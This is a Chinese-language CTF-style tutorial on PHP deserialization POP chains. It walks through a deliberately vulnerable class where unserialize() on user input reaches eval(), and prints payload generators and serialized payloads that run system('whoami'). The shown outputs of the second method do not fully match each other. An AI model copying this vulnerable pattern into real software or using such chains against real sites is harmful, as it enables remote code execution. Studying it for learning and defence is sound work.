成员属性存放对象!!
成员属性存放对象!!
成员属性存放对象!!
入门学习POP链,一般使用反推法
直接看例题
例1:橙子
<?php
class index {private $test;public function __construct(){$this->test = new normal();}public function __destruct(){$this->test->action();}
}
class normal {public function action(){echo "please attack me";}
}
class evil {var $test2;public function action(){eval($this->test2);}
}
unserialize($_GET['test']);
?>
想拿flag,首先找到evil代码执行,发现是由evil这个类action()这个方法,执行的是$test2传入的参数。
class evil {var $test2;public function action(){eval($this->test2);}
}
--继续往下看,找到实例化这个对象的代码,发现这里有调用action方法,不过也能看到这里test属性的值为normal的对象实例,执行的是normal的action方法,我们就要想办法把test的值替换成evil的对象实例,由此来调用evil中的action。
class index {private $test;public function __construct(){$this->test = new normal();}public function __destruct(){$this->test->action();}
}
--这里看到执行action的是__destruct魔术方法,代码中正好有反序列化,反序列化结束对象销毁后触发__destruct。所以我们接下来构造payload
(1)、将evil类的test2,传入我们想要执行的命令
(2)、将index类的test,变成new evil(),也就是实例化eval对象。
<?php
class index {private $test;public function __construct(){$this->test = new evil();}
}
class evil {var $test2="system('whoami')";
}
$a=serialize(new index());
echo $a;
echo urlencode($a);
?>
O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:16:"system('whoami')";}}
O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A16%3A%22system%28%27whoami%27%29%22%3B%7D%7D
还有一种方法,外部构造,但是要注意这里是test是private,我们可以先当作public生成payload,然后手动修改
<?php
class index {public $test;
}
class evil {var $test2;
}
$a = new evil();
$a->test2 = "system('whoami')";
$b = new index();
$b->test = $a;
echo serialize($b);
echo urlencode(serialize($b));
?>
O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:16:"system('whoami')";}}
O%3A5%3A%22index%22%3A1%3A%7Bs%3A4%3A%22test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A16%3A%22system%28%27whoami%27%29%22%3B%7D%7D